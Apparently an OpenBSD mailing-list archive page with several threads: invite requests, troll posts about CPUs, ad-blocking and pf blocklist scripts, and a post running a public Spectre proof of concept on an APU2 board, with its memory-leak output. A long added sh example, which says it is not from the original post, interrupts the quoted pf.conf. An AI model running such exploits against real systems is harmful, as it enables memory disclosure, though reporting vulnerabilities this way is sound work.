lobste.rs invite received

2018-08-25 Thread Ken M
Thank you

Ken



Lobste.rs

2018-08-25 Thread Ken M
Figuring there are a good number of members on this list who are also on
Lobste.rs.

Anyway I was hoping to get an invite to create an account there if someone
could.

Thank you,
Ken



APU2 and Spectre

2018-08-25 Thread Consus
Hi,

Seems like the APU2 board is vulnerable to Spectre:

$ uname -r
6.3
$ dmesg | grep cpu0 | grep AMD
cpu0: AMD GX-412TC SOC, 998.27 MHz
$ git clone https://github.com/crozone/SpectrePoC
$ cd SpectrePoC
$ gmake
$ ./spectre.out 85
Using a cache hit threshold of 85.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED
Reading 40 bytes:
Reading at malicious_x = 0xffeff180... Success: 0x54='T' score=2
Reading at malicious_x = 0xffeff181... Success: 0x68='h' score=2
Reading at malicious_x = 0xffeff182... Success: 0x65='e' score=2
Reading at malicious_x = 0xffeff183... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffeff184... Success: 0x4D='M' score=2
Reading at malicious_x = 0xffeff185... Success: 0x61='a' score=2
Reading at malicious_x = 0xffeff186... Success: 0x67='g' score=2
Reading at malicious_x = 0xffeff187... Success: 0x69='i' score=2
Reading at malicious_x = 0xffeff188... Success: 0x63='c' score=2
Reading at malicious_x = 0xffeff189... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffeff18a... Success: 0x57='W' score=2
Reading at malicious_x = 0xffeff18b... Success: 0x6F='o' score=2
Reading at malicious_x = 0xffeff18c... Success: 0x72='r' score=2
Reading at malicious_x = 0xffeff18d... Success: 0x64='d' score=2
Reading at malicious_x = 0xffeff18e... Success: 0x73='s' score=2
Reading at malicious_x = 0xffeff18f... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffeff190... Success: 0x61='a' score=2
Reading at malicious_x = 0xffeff191... Success: 0x72='r' score=2
Reading at malicious_x = 0xffeff192... Success: 0x65='e' score=2
Reading at malicious_x = 0xffeff193... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffeff194... Success: 0x53='S' score=2
Reading at malicious_x = 0xffeff195... Success: 0x71='q' score=2
Reading at malicious_x = 0xffeff196... Success: 0x75='u' score=2
Reading at malicious_x = 0xffeff197... Success: 0x65='e' score=2
Reading at malicious_x = 0xffeff198... Success: 0x61='a' score=2
Reading at malicious_x = 0xffeff199... Success: 0x6D='m' score=2
Reading at malicious_x = 0xffeff19a... Success: 0x69='i' score=2
Reading at malicious_x = 0xffeff19b... Success: 0x73='s' score=2
Reading at malicious_x = 0xffeff19c... Success: 0x68='h' score=2
Reading at malicious_x = 0xffeff19d... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffeff19e... Success: 0x4F='O' score=2
Reading at malicious_x = 0xffeff19f... Success: 0x73='s' score=2
Reading at malicious_x = 0xffeff1a0... Success: 0x73='s' score=2
Reading at malicious_x = 0xffeff1a1... Success: 0x69='i' score=2
Reading at malicious_x = 0xffeff1a2... Success: 0x66='f' score=2
Reading at malicious_x = 0xffeff1a3... Success: 0x72='r' score=2
Reading at malicious_x = 0xffeff1a4... Success: 0x61='a' score=2
Reading at malicious_x = 0xffeff1a5... Success: 0x67='g' score=2
Reading at malicious_x = 0xffeff1a6... Success: 0x65='e' score=2
Reading at malicious_x = 0xffeff1a7... Success: 0x2E='.' score=2

I've double-checked the output of syspatch(8) and fw_update(8), but no
pending updates exist. Am I missing something, or is there no mitigation
for this AMD CPU family?



Re: Atom CPU is clear of L1TF

2018-08-25 Thread Benjamin Baier
On Sat, 25 Aug 2018 07:10:14 +
Rupert Gallagher wrote:

> While Intel Core and Xeon are affected by L1TF, Atom CPUs (c3000) are clear 
> of it. Applying the patch to Cores and Xeons basically turns those CPUs into 
> Atoms. It is a shame that the self-appointed "most secure OS" does not run on 
> such processors.

What? Atom X works well, why wouldn't it run on C3000?
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Atom(TM) x7-Z8750 CPU @ 1.60GHz, 1600.36 MHz

> Your faithful troll.
I see.



Re: SuperMicro A2SDi-4C-HLN4F

2018-08-25 Thread Rupert Gallagher
 wrote:

> This vendor addresses hardware & firmware faults like the other enterprise 
> vendors, they DON'T past year two. BIOS and BMC firmwares are not updated 
> after this even with the long term lifetime products, you are on your own!

On bios and ipmi updates, you can download and apply them yourself. For 
advanced bios updates, there is a licence you can purchase, as you do with Dell 
and HP.

On warranty, they are in line with the industry standards:

https://www.supermicro.com/support/Warranty/

On open source, they work with the community, well enough to have a certified 
list of compatible systems:

https://www.supermicro.com/support/faqs/os.cfm

When you are in business, you do not want to go back to the drawing board each 
time. You need a platform on which to build your own services. If you have to 
develop disk and keyboard drivers, and you are told off on the support 
mailing list, then the OS is worth nothing to you. OpenBSD is not ready for 
enterprise.

Your faithful troll.


Re: Addblock + Badhost blocking via unbound(8) and pf anchors

2018-08-25 Thread jin
Thanks Jordan, I will look at those links.

On Sat, 25 Aug 2018, 10:31 Jordan Geoghegan wrote:

> You may want to check out the more recent guides I wrote for the updated
> version of these scripts:
>
> www.geoghegan.ca/unbound-adblock.html
>
> www.geoghegan.ca/pfbadhost.html
>

Re: Addblock + Badhost blocking via unbound(8) and pf anchors

2018-08-25 Thread Jordan Geoghegan
You may want to check out the more recent guides I wrote for the updated 
version of these scripts:


www.geoghegan.ca/unbound-adblock.html

www.geoghegan.ca/pfbadhost.html


On 08/24/18 06:32, jin wrote:

Hello

Thanks for sharing all this information. I've been looking for a way to 
create a blacklist and you sent this mail just in time. Your web page 
helped me a lot.
On OpenBSD your script does all the jobs, but on Linux-based systems I 
wrote a shell script to update iptables rules.


http://analog-radyo.blogspot.com/2018/08/dynamic-block-list-on-linux-iptables.html


Jordan Geoghegan wrote on Sat, 30 Dec 2017, at 01:52:


Hi everyone,

Due to the number of people who have requested my ad-blocking scripts, I
figured I would also post them to @misc so anyone can easily enjoy
network-wide bad-host/ad-blocking.

I won't go into detail on how to set up routing/dhcp/unbound/anchors
etc, for that see: https://www.openbsd.org/faq/pf/example1.html

I've included some example files from an Edgerouter I have set up. They
are trimmed down for brevity's sake; the conf files are not production
ready, these are merely examples.

This setup is easily customizable, if you come across any other block
lists you prefer, then they can be dropped in no problem. I chose to use
solely the StevenBlack hosts file because it is a master list compiled
from all the major banlists found in popular blocking products such as
uBlock Origin, Adblock Plus et al. I also chose this file because it is
filtered for duplicates as unbound(8) is said to struggle when there are
redundancies in the blocklists, I'm told -- though I've never had any
issue.

You're going to have to read the scripts and create the directories the
scripts are calling and edit the anchor macros to fit your interface
layout (I doubt everyone here is running cnmac0 as egress) and also will
have to make the scripts executable and set them to run at regular
intervals with crontab, ideally nightly.

I didn't make these scripts intelligent because I figured it was simpler
to just run mkdir once rather than add extra lines to the script.

I know the pf.conf is fairly long, I thought I would show an example of
my prio and queuing setup as an example, or conversely to see if anyone
can poke any holes in it.

All the relevant bits regarding the anchors and blocklists are found at
the end of the pf.conf file. See below that for the anchor conf files
we're calling as well.

Hope this helps,

Jordan Geoghegan


First, the scripts:

*DNS ad-block script:*

StevenBlack.sh:

#!/bin/sh
# Fetch the StevenBlack hosts file into the unbound banlist directory and turn
# every "0.0.0.0 host" entry into a local-zone redirect plus a local-data A
# record pointing at 0.0.0.0, then reload unbound so it picks up ads.conf.
cd /var/unbound/etc/banlist && \
ftp https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts && \
grep '^0\.0\.0\.0' hosts | awk '{print "local-zone: \""$2"\" redirect\nlocal-data: \""$2" A 0.0.0.0\""}' > ads.conf
rcctl reload unbound

###

*IP based malicious IP blocking:*

banlist.sh:

#!/bin/sh
# Fetch the IP blocklists into /etc/blocklist, then reload the 'banlist'
# anchor from /etc/banlist.conf (not shown), whose rules reference those files.
cd /etc/blocklist && \
ftp https://www.binarydefense.com/banlist.txt && \
ftp https://rules.emergingthreats.net/blockrules/compromised-ips.txt && \
ftp https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt && \
ftp https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level3.netset
pfctl -a banlist -f /etc/banlist.conf

###

As you can see, we are going to have to make an anchor in pf called
'banlist' and modify the unbound.conf to load our banlist 'ads.conf'

If that's all you need, then you're pretty much good to go. If you
would
like to see my example conf files, see below.

*Example unbound.conf:*

# $OpenBSD: unbound.conf,v 1.7 2016/03/30 01:41:25 sthen Exp $

server:
        interface: 172.17.17.1
        interface: 127.0.0.1
        access-control: 172.17.17.0/24  allow
        access-control: 172.17.0.0/24  allow
        do-not-query-localhost: no
        hide-identity: yes
        hide-version: yes
        include: /var/unbound/etc/banlist/ads.conf

forward-zone:
        name: "."
        forward-addr: UR.DNS.GO.HERE
        forward-addr: UR.DNS.GO.HERE

###


*Example pf.conf:*

#       $OpenBSD: pf.conf,v 1.54 2014/08/23 05:49:42 deraadt Exp $
#
# See pf.conf(5) and /etc/examples/pf.conf

# By default, do not permit remote connections to X11
block return in on ! lo0 proto tcp to port 6000:6010
#

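The two scripts quoted in the post above feed whatever the remote lists return straight into unbound(8) and pf(4): a malformed or hostile hosts line can break the generated ads.conf (a quote character in the hostname ends the local-zone string early), and a raw IP feed handed to a pf table can carry a hostname (which pfctl would resolve via DNS at load time) or a /0 prefix that blackholes everything. The following is an added sh(1) example, not code from the original post, that performs the same two conversions with per-entry validation and writes the results through temporary files. The sample hosts and IP-list lines are constructed, and the function names, the banlist.table output name and the output directory are assumptions.

```sh
#!/bin/sh
# Added example (not from the original post): build the unbound(8) include
# file and a pf(4) table file from hosts-style and IP-list inputs, validating
# every entry so a hostile or malformed upstream list cannot smuggle config
# directives, hostnames or a catch-all prefix into the resolver or firewall.
# In real use, feed the downloaded files (hosts, banlist.txt, ...) through the
# same functions; the inputs used here are constructed samples.

# hosts_to_unbound: stdin is a hosts file ("0.0.0.0 hostname" lines, comments
# allowed). Emits a local-zone/local-data pair for every hostname with valid
# DNS label syntax, skipping case-insensitive duplicates and the "0.0.0.0
# 0.0.0.0" placeholder line that hosts files of this kind contain.
hosts_to_unbound() {
    awk '
    $1 == "0.0.0.0" && $2 != "0.0.0.0" &&
    $2 ~ /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)+$/ &&
    !seen[tolower($2)]++ {
        printf "local-zone: \"%s\" redirect\nlocal-data: \"%s A 0.0.0.0\"\n", $2, $2
    }'
}

# iplists_to_table: arguments are IP list files (one IPv4 address or CIDR per
# line, "#" comments allowed; IPv6 lines are ignored, as the feeds in the post
# are IPv4). Emits a sorted, deduplicated pf table file. Hostnames are dropped
# on purpose, since pfctl(8) would resolve them with DNS when loading the
# table, and a /0 prefix is rejected because it would block all traffic.
iplists_to_table() {
    sed -e 's/#.*//' -e 's/[[:space:]]//g' "$@" |
    awk -F'[./]' '
    NF == 4 || NF == 5 {
        ok = 1
        for (i = 1; i <= 4; i++)
            if ($i !~ /^[0-9]+$/ || $i > 255) ok = 0
        if (NF == 5 && ($5 !~ /^[0-9]+$/ || $5 < 1 || $5 > 32)) ok = 0
        if (ok) print
    }' | sort -u
}

# build_blocklists OUTDIR HOSTSFILE IPLIST...: write OUTDIR/ads.conf and
# OUTDIR/banlist.table via temporary files, so a crash mid-write never leaves
# a half-written file for unbound or pf to load. Fails (leaving the previous
# generation in place) if either result is empty, which usually means a
# download failed or a feed changed format.
build_blocklists() {
    outdir=$1; hosts=$2; shift 2
    hosts_to_unbound < "$hosts" > "$outdir/ads.conf.tmp" &&
    iplists_to_table "$@" > "$outdir/banlist.table.tmp" &&
    [ -s "$outdir/ads.conf.tmp" ] && [ -s "$outdir/banlist.table.tmp" ] &&
    mv "$outdir/ads.conf.tmp" "$outdir/ads.conf" &&
    mv "$outdir/banlist.table.tmp" "$outdir/banlist.table"
}

# Constructed sample inputs (not the contents of any real feed), including the
# kinds of lines the filters above must reject.
sample_hosts() {
cat <<'EOF'
# constructed sample, not the real StevenBlack file
127.0.0.1 localhost
0.0.0.0 0.0.0.0
0.0.0.0 ads.example.com
0.0.0.0 tracker.example.net   # trailing comment
0.0.0.0 ADS.EXAMPLE.COM
0.0.0.0 bad"host.example.org
0.0.0.0 -leading.example.org
0.0.0.0 server:
0.0.0.0 metrics.example.io
EOF
}

sample_iplist() {
cat <<'EOF'
# constructed sample, not a real feed
192.0.2.10
192.0.2.10
198.51.100.0/24
203.0.113.5   # comment after the entry
2001:db8::1
999.1.1.1
10.0.0.0/0
evil.example.com
0.0.0.0/0
EOF
}

# Stand-alone demonstration: build both files in a scratch directory from the
# samples (the same feed twice, to show that entries are not doubled).
tmp=$(mktemp -d) || exit 1
sample_hosts > "$tmp/hosts"
sample_iplist > "$tmp/feed1.txt"
sample_iplist > "$tmp/feed2.txt"
build_blocklists "$tmp" "$tmp/hosts" "$tmp/feed1.txt" "$tmp/feed2.txt" || exit 1
cat "$tmp/ads.conf" "$tmp/banlist.table"
rm -rf "$tmp"
```

On the router you would call build_blocklists on the downloaded files with /var/unbound/etc/banlist and /etc/blocklist as targets, run unbound-checkconf before rcctl reload unbound so a bad generation does not take the resolver down, and load the addresses with pfctl -t banlist -T replace -f /etc/blocklist/banlist.table (this assumes a persist table named banlist declared in the anchor, rather than the rule-per-address loading the original banlist.conf may do). When build_blocklists fails, nothing is moved into place and no reload is needed.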
Atom CPU is clear of L1TF

2018-08-25 Thread Rupert Gallagher
While Intel Core and Xeon are affected by L1TF, Atom CPUs (c3000) are clear of 
it. Applying the patch to Cores and Xeons basically turns those CPUs into 
Atoms. It is a shame that the self-appointed "most secure OS" does not run on 
such processors.

Your faithful troll.